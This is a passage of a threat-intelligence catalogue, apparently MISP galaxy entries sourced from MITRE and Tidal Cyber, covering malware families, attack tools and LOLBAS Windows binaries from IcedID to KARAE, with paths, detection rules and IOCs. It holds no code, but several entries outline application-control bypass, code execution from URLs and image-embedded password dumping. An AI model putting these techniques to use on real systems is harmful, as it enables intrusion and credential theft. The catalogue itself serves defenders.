UUID 7f59bb7c-5fa9-497d-9d8e-ba9349fd9433
which can be used as unique global reference for IcedID
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0483 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Ie4uinit
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Executes commands from a specially prepared ie4uinit.inf file.
Author: Oddvar Moe
Paths:
* c:\windows\system32\ie4uinit.exe
* c:\windows\sysWOW64\ie4uinit.exe
* c:\windows\system32\ieuinit.inf
* c:\windows\sysWOW64\ieuinit.inf
Resources:
* https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
Detection:
* IOC: ie4uinit.exe copied outside of %windir%
* IOC: ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir%
* Sigma: proc_creation_win_lolbin_ie4uinit.yml[Ie4uinit.exe - LOLBAS Project]
Internal MISP references
UUID 332e37c0-63fe-4e99-85a9-94210d42c21d
which can be used as unique global reference for Ie4uinit
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5116 |
source | Tidal Cyber |
tags | ['f32f1513-7277-4257-9c35-c8ab3da17c84', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Ieadvpack
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll.
Author: LOLBAS Team
Paths:
* c:\windows\system32\ieadvpack.dll
* c:\windows\syswow64\ieadvpack.dll
Resources:
* https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
* https://twitter.com/pabraeken/status/991695411902599168
* https://twitter.com/0rbz_/status/974472392012689408
Detection:
* Sigma: proc_creation_win_rundll32_susp_activity.yml
* Splunk: detect_rundll32_application_control_bypass___advpack.yml[Ieadvpack.dll - LOLBAS Project]
Internal MISP references
UUID e1aa3cbd-2337-47d6-b6b0-beb5d1bbfc1e
which can be used as unique global reference for Ieadvpack
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5190 |
source | Tidal Cyber |
tags | ['e794994d-c38a-44d9-9253-53191ca9e56b', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
iediagcmd
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Diagnostics Utility for Internet Explorer
Author: manasmbellani
Paths:
* C:\Program Files\Internet Explorer\iediagcmd.exe
Resources:
* https://twitter.com/Hexacorn/status/1507516393859731456
Detection:
* Sigma: https://github.com/manasmbellani/mycode_public/blob/master/sigma/rules/win_proc_creation_lolbin_iediagcmd.yml
* IOC: Sysmon Event ID 1
* IOC: Execution of process iediagcmd.exe with /out could be suspicious[iediagcmd.exe - LOLBAS Project]
Internal MISP references
UUID 1feba268-9fff-495f-94e9-5b46336bff3b
which can be used as unique global reference for iediagcmd
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5117 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Ieexec
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
Author: Oddvar Moe
Paths:
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
Resources:
* https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
Detection:
* Sigma: proc_creation_win_lolbin_ieexec_download.yml
* Elastic: defense_evasion_unusual_process_network_connection.toml
* Elastic: defense_evasion_misc_lolbin_connecting_to_the_internet.toml
* Elastic: defense_evasion_network_connection_from_windows_binary.toml
* IOC: Network connections originating from ieexec.exe may be suspicious[Ieexec.exe - LOLBAS Project]
Internal MISP references
UUID e7ede205-4d50-42c3-92d0-4988aca5c4a1
which can be used as unique global reference for Ieexec
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5118 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Ieframe
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Internet Browser DLL for translating HTML code.
Author: LOLBAS Team
Paths:
* c:\windows\system32\ieframe.dll
* c:\windows\syswow64\ieframe.dll
Resources:
* http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
* https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
* https://twitter.com/bohops/status/997690405092290561
* https://windows10dll.nirsoft.net/ieframe_dll.html
Detection:
* Sigma: proc_creation_win_rundll32_susp_activity.yml[Ieframe.dll - LOLBAS Project]
Internal MISP references
UUID 57072f02-06c1-4267-b665-fbbf72b96bb4
which can be used as unique global reference for Ieframe
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5191 |
source | Tidal Cyber |
tags | ['fc23fb85-8c48-4f0b-aeb6-b78fd6e25e0a', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ifconfig
ifconfig is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system. [Wikipedia Ifconfig]
Internal MISP references
UUID 93ab16d1-625e-4b1c-bb28-28974c269c47
which can be used as unique global reference for ifconfig
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0101 |
source | MITRE |
type | ['tool'] |
iKitten
iKitten is a macOS exfiltration agent [objsee mac malware 2017].
Internal MISP references
UUID 71098f6e-a2c0-434f-b991-6c079fd3e82d
which can be used as unique global reference for iKitten
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0278 |
source | MITRE |
type | ['malware'] |
Ilasm
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used to compile C# code into a DLL or EXE.
Author: Hai vaknin (lux)
Paths:
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
Resources:
* https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt
Detection:
* IOC: Ilasm may not be used often in production environments (such as on endpoints)
* Sigma: proc_creation_win_lolbin_ilasm.yml[Ilasm.exe - LOLBAS Project]
Internal MISP references
UUID 492104c0-79d6-461e-9dc5-0e4bfd3f2387
which can be used as unique global reference for Ilasm
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5119 |
source | Tidal Cyber |
tags | ['8bcce456-e1dc-4dd0-99a9-8334fd6f2847', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
IMAPLoader
IMAPLoader is a .NET downloader that uses email-based channels for command and control communication. It is believed to be developed and used by Yellow Liderc, a threat actor group based in Iran and aligned with the Iranian Islamic Revolutionary Guard Corps (IRGC). IMAPLoader is delivered via drive-by compromises and phishing attacks.[PwC Yellow Liderc October 25 2023]
Internal MISP references
UUID 0832ffda-240a-4455-a53b-71b2683bea09
which can be used as unique global reference for IMAPLoader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5308 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
IMEWDBLD
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft IME Open Extended Dictionary Module
Author: Wade Hickey
Paths:
* C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
Resources:
* https://twitter.com/notwhickey/status/1367493406835040265
Detection:
* Sigma: net_connection_win_imewdbld.yml[IMEWDBLD.exe - LOLBAS Project]
Internal MISP references
UUID 2ef7c673-a0dc-4773-a9fd-337ed68d9b0b
which can be used as unique global reference for IMEWDBLD
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5115 |
source | Tidal Cyber |
tags | ['796962fe-56d7-4816-9193-153da0be7c10', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Imminent Monitor
Imminent Monitor was a commodity remote access tool (RAT) offered for sale from 2012 until 2019, when an operation was conducted to take down the Imminent Monitor infrastructure. Various cracked versions and variations of this RAT are still in circulation.[Imminent Unit42 Dec2019]
Internal MISP references
UUID 925fc0db-9315-4703-9353-1d0e9ecb1439
which can be used as unique global reference for Imminent Monitor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0434 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['tool'] |
Impacket
Impacket is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. Impacket contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.[Impacket Tools]
Internal MISP references
UUID cf2c5666-e8ad-49c1-ac8f-30ed65f9e52c
which can be used as unique global reference for Impacket
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0357 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '6070668f-1cbd-4878-8066-c636d1d8659c', 'd8f7e071-fbfd-46f8-b431-e241bb1513ac', '61cdbb28-cbfd-498b-9ab1-1f14337f9524', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '6a80006a-ff1c-48e8-bb6f-d109d7b7a2fc', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '4d767e87-4cf6-438a-927a-43d2d0beaab7', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Industroyer
Industroyer is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.[ESET Industroyer] Industroyer was used in the attacks on the Ukrainian power grid in December 2016.[Dragos Crashoverride 2017] This is the first publicly known malware specifically designed to target and impact operations in the electric grid.[Dragos Crashoverride 2018]
Internal MISP references
UUID 09398a7c-aee5-44af-b99d-f73d3b39c299
which can be used as unique global reference for Industroyer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0604 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647', '37dff778-95a6-4e51-a26a-1d399ef713be'] |
type | ['malware'] |
Industroyer2
Industroyer2 is a compiled and static piece of malware that has the ability to communicate over the IEC-104 protocol. It is similar to the IEC-104 module found in Industroyer. Security researchers assess that Industroyer2 was designed to cause impact to high-voltage electrical substations. The initial Industroyer2 sample was compiled on 03/23/2022 and scheduled to execute on 04/08/2022; however, it was discovered before deployment, resulting in no impact.[Industroyer2 Blackhat ESET]
Internal MISP references
UUID 53c5fb76-a690-55c3-9e02-39577990da2a
which can be used as unique global reference for Industroyer2
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S1072 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647', '37dff778-95a6-4e51-a26a-1d399ef713be'] |
type | ['malware'] |
Infdefaultinstall
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary used to perform installation based on content inside inf files.
Author: Oddvar Moe
Paths:
* C:\Windows\System32\Infdefaultinstall.exe
* C:\Windows\SysWOW64\Infdefaultinstall.exe
Resources:
* https://twitter.com/KyleHanslovan/status/911997635455852544
* https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
* https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
Detection:
* Sigma: proc_creation_win_infdefaultinstall_execute_sct_scripts.yml
* BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules[Infdefaultinstall.exe - LOLBAS Project]
Internal MISP references
UUID e35b5513-4370-4f8c-b3a6-1f64c65f1e85
which can be used as unique global reference for Infdefaultinstall
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5120 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
InnaputRAT
InnaputRAT is a remote access tool that can exfiltrate files from a victim’s machine. InnaputRAT has been seen out in the wild since 2016. [ASERT InnaputRAT April 2018]
Internal MISP references
UUID e42bf572-1e70-4467-a4b7-5e22c776c758
which can be used as unique global reference for InnaputRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0259 |
source | MITRE |
type | ['malware'] |
Installutil
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies.
Author: Oddvar Moe
Paths:
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
Resources:
* https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
* https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md
* https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
* https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool
Detection:
* Sigma: proc_creation_win_instalutil_no_log_execution.yml
* Sigma: proc_creation_win_lolbin_installutil_download.yml
* Elastic: defense_evasion_installutil_beacon.toml
* Elastic: defense_evasion_network_connection_from_windows_binary.toml[LOLBAS Installutil]
Internal MISP references
UUID c983bb77-b96c-44d5-b3f8-2540d7c604db
which can be used as unique global reference for Installutil
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5121 |
source | Tidal Cyber |
tags | ['a3f84674-3813-4993-9e34-39cdaa19cbd1', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Interactsh
According to joint Cybersecurity Advisory AA23-250A (September 2023), Interactsh is "an open-source tool for detecting external interactions (communication)". The Advisory further states that the tool is "used to detect callbacks from target systems for specified vulnerabilities and commonly used during the reconnaissance stages of adversary activity".[U.S. CISA Zoho Exploits September 7 2023]
Internal MISP references
UUID 9ec3777d-9a36-4822-a3e2-a7ce5d296309
which can be used as unique global reference for Interactsh
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5049 |
source | Tidal Cyber |
tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee'] |
type | ['tool'] |
Inveigh
Inveigh is an open-source utility. According to its GitHub project page, it is a "machine-in-the-middle" tool designed for penetration testing purposes.[GitHub Inveigh]
Internal MISP references
UUID 5658f260-8e96-4fa5-9863-189660048e5d
which can be used as unique global reference for Inveigh
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5272 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
type | ['tool'] |
InvisiMole
InvisiMole is a modular spyware program that has been used by the InvisiMole Group since at least 2013. InvisiMole has two backdoor modules called RC2FM and RC2CL that are used to perform post-exploitation activities. It has been discovered on compromised victims in Ukraine and Russia. Gamaredon Group infrastructure has been used to download and execute InvisiMole against a small number of victims.[ESET InvisiMole June 2018][ESET InvisiMole June 2020]
Internal MISP references
UUID 3ee4c49d-2f2c-4677-b193-69f16f2851a4
which can be used as unique global reference for InvisiMole
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0260 |
source | MITRE |
type | ['malware'] |
Invoke-PSImage
Invoke-PSImage takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one-liner for executing either from a file or from the web. An example of usage is embedding the PowerShell code from the Invoke-Mimikatz module into an image file. By calling the image file from a macro, for example, the macro will download the picture and execute the PowerShell code, which in this case will dump the passwords. [GitHub Invoke-PSImage]
Internal MISP references
UUID 2200a647-3312-44c0-9691-4a26153febbb
which can be used as unique global reference for Invoke-PSImage
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0231 |
source | MITRE |
type | ['tool'] |
IOBit
IOBit is a self-described "freeware" tool that can ostensibly be used to "clean, optimize, speed up and secure" personal computers. According to U.S. cybersecurity authorities, IOBit has been used by adversaries, such as ransomware actors, as part of their operations, for example to disable anti-virus software.[U.S. CISA Play Ransomware December 2023]
Internal MISP references
UUID 9c955014-2d83-4b5b-9127-cfc49e86779f
which can be used as unique global reference for IOBit
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5080 |
source | Tidal Cyber |
tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ipconfig
ipconfig is a Windows utility that can be used to find information about a system's TCP/IP, DNS, DHCP, and adapter configuration. [TechNet Ipconfig]
Internal MISP references
UUID 4f519002-0576-4f8e-8add-73ebac9a86e6
which can be used as unique global reference for ipconfig
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0100 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
IronNetInjector
IronNetInjector is a Turla toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads, including ComRAT.[Unit 42 IronNetInjector February 2021]
Internal MISP references
UUID 9ca96281-8ff9-4619-a79d-16c5a9594eae
which can be used as unique global reference for IronNetInjector
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0581 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['tool'] |
ISMInjector
ISMInjector is a Trojan used to install another OilRig backdoor, ISMAgent. [OilRig New Delivery Oct 2017]
Internal MISP references
UUID 752ab0fc-7fa1-4e54-bd9a-7a280a38ed77
which can be used as unique global reference for ISMInjector
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0189 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Ixeshe
Ixeshe is a malware family that has been used since at least 2009 against targets in East Asia. [Moran 2013]
Internal MISP references
UUID 6dbf31cf-0ba0-48b4-be82-38889450845c
which can be used as unique global reference for Ixeshe
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0015 |
source | MITRE |
type | ['malware'] |
Jaguar Tooth
Jaguar Tooth is a malicious software bundle consisting of a series of payloads and patches. Russia-backed APT28 used Jaguar Tooth during a series of compromises involving vulnerable Cisco routers belonging to U.S., Ukrainian, and other entities in 2021.[U.S. CISA APT28 Cisco Routers April 18 2023]
According to an April 2023 UK National Cyber Security Centre technical report on Jaguar Tooth, the malware is deployed and executed via exploitation of CVE-2017-6742, a Simple Network Management Protocol (SNMP) vulnerability for which Cisco released a patch in 2017. Jaguar Tooth deployments allowed actors to collect further device information via execution of Cisco IOS Command Line Interface commands, discover other network devices, and achieve unauthenticated backdoor access to victim systems.[UK NCSC Jaguar Tooth April 18 2023]
Related Vulnerabilities: CVE-2017-6742[U.S. CISA APT28 Cisco Routers April 18 2023]
Internal MISP references
UUID 0eb47e25-56ec-42ba-9850-e50450b853e0
which can be used as unique global reference for Jaguar Tooth
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Network'] |
software_attack_id | S5061 |
source | Tidal Cyber |
tags | ['b20e7912-6a8d-46e3-8e13-9a3fc4813852', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '15787198-6c8b-4f79-bf50-258d55072fee', 'f01290d9-7160-44cb-949f-ee4947d04b6f', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
type | ['malware'] |
Janicab
Janicab is an OS X trojan that relied on a valid developer ID and oblivious users to install it. [Janicab]
Internal MISP references
UUID a4debf1f-8a37-4c89-8ebc-31de71d33f79
which can be used as unique global reference for Janicab
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0163 |
source | MITRE |
type | ['malware'] |
Javali
Javali is a banking trojan that has targeted Portuguese and Spanish-speaking countries since 2017, primarily focusing on customers of financial institutions in Brazil and Mexico.[Securelist Brazilian Banking Malware July 2020]
Internal MISP references
UUID 853d3d18-d746-4650-a9bd-c36a0e86dd02
which can be used as unique global reference for Javali
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0528 |
source | MITRE |
type | ['malware'] |
JCry
JCry is ransomware written in Go. It was identified as part of the #OpJerusalem 2019 campaign.[Carbon Black JCry May 2019]
Internal MISP references
UUID 41ec0bbc-65ca-4913-a763-1638215d7b2f
which can be used as unique global reference for JCry
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0389 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
JHUHUGIT
JHUHUGIT is malware used by APT28. It is based on Carberp source code and serves as reconnaissance malware. [Kaspersky Sofacy] [F-Secure Sofacy 2015] [ESET Sednit Part 1] [FireEye APT28 January 2017]
Internal MISP references
UUID d50ef3fc-7d1c-4a82-b1cf-2319d83da3ae
which can be used as unique global reference for JHUHUGIT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0044 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
JPIN
JPIN is a custom-built backdoor family used by PLATINUM. Evidence suggests developers of JPIN and Dipsind code bases were related in some way. [Microsoft PLATINUM April 2016]
Internal MISP references
UUID c96fce69-6b9c-4bbc-bb42-f6a8fb6eb88f
which can be used as unique global reference for JPIN
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0201 |
source | MITRE |
type | ['malware'] |
jRAT
jRAT is a cross-platform, Java-based backdoor originally available for purchase in 2012. Variants of jRAT have been distributed via a software-as-a-service platform, similar to an online subscription model.[Kaspersky Adwind Feb 2016] [jRAT Symantec Aug 2018]
Internal MISP references
UUID 42fe9795-5cf6-4ad7-b56e-2aa655377992
which can be used as unique global reference for jRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Android', 'Windows'] |
software_attack_id | S0283 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
type | ['malware'] |
Jsc
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary file used by .NET to compile JavaScript code to .exe or .dll format.
Author: Oddvar Moe
Paths:
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe
Resources:
* https://twitter.com/DissectMalware/status/998797808907046913
* https://www.phpied.com/make-your-javascript-a-windows-exe/
Detection:
* Sigma: proc_creation_win_lolbin_jsc.yml
* IOC: Jsc.exe should normally not run on a system unless it is used for development.[Jsc.exe - LOLBAS Project]
Internal MISP references
UUID 1c67bf0b-22f8-4f57-8f91-f15b4923455f
which can be used as unique global reference for Jsc
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5122 |
source | Tidal Cyber |
tags | ['ee16a0c7-b3cf-4303-9681-b3076da9bff0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
JSS Loader
JSS Loader is a Remote Access Trojan (RAT) with .NET and C++ variants that has been used by FIN7 since at least 2020.[eSentire FIN7 July 2021][CrowdStrike Carbon Spider August 2021]
Internal MISP references
UUID c67f3029-a26c-4752-b7f1-8e3369c2f79d
which can be used as unique global reference for JSS Loader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0648 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Juicy Potato
Juicy Potato is an open-source software project that, according to its GitHub page, can be used for privilege escalation purposes.[GitHub ohpe Juicy Potato]
Internal MISP references
UUID 57e9c32b-a1fa-45bc-9a57-098834a2c356
which can be used as unique global reference for Juicy Potato
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5303 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
KARAE
KARAE is a backdoor typically used by APT37 as first-stage malware. [FireEye APT37 Feb 2018]
Internal MISP references
UUID ca883d21-97ca-420d-a66b-ef19a8355467
which can be used as unique global reference for KARAE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
